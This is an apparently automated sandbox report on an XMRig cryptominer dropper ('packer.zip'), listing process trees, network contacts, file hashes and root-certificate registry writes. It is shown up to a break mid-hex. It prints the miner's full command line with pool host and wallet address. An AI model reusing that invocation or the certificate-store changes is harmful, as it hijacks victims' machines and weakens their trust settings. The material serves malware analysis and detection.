Malware Analysis Report

2025-01-06 21:17

Sample ID 240614-p1mevs1epa
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

xmrig

XMRig Miner payload

Executes dropped EXE

Unsigned PE

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4008,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1400,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=4072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
NL 52.142.223.178:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 147.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/516-14-0x0000020BAC5F0000-0x0000020BAC610000-memory.dmp

memory/516-15-0x0000020BADD50000-0x0000020BADD70000-memory.dmp

memory/516-16-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-18-0x0000020BADD70000-0x0000020BADD90000-memory.dmp

memory/516-17-0x0000020BADD90000-0x0000020BADDB0000-memory.dmp

memory/516-19-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-20-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-23-0x0000020BADD70000-0x0000020BADD90000-memory.dmp

memory/516-22-0x0000020BADD90000-0x0000020BADDB0000-memory.dmp

memory/516-21-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-24-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-25-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-26-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-27-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-28-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-29-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-30-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-31-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-32-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-33-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-34-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-35-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-36-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-37-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-38-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-39-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-40-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-41-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-42-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-43-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-44-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-45-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-46-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-47-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-48-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-49-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-50-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-51-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-52-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-53-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-54-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-55-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-56-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-57-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-58-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-59-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-60-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-61-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-62-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-63-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-64-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-65-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-66-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-67-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-68-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-69-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-70-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-71-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-72-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-73-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-74-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-75-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-76-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-77-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-78-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-79-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-80-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-81-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

memory/516-82-0x00007FF691AC0000-0x00007FF6925C3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1792s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5e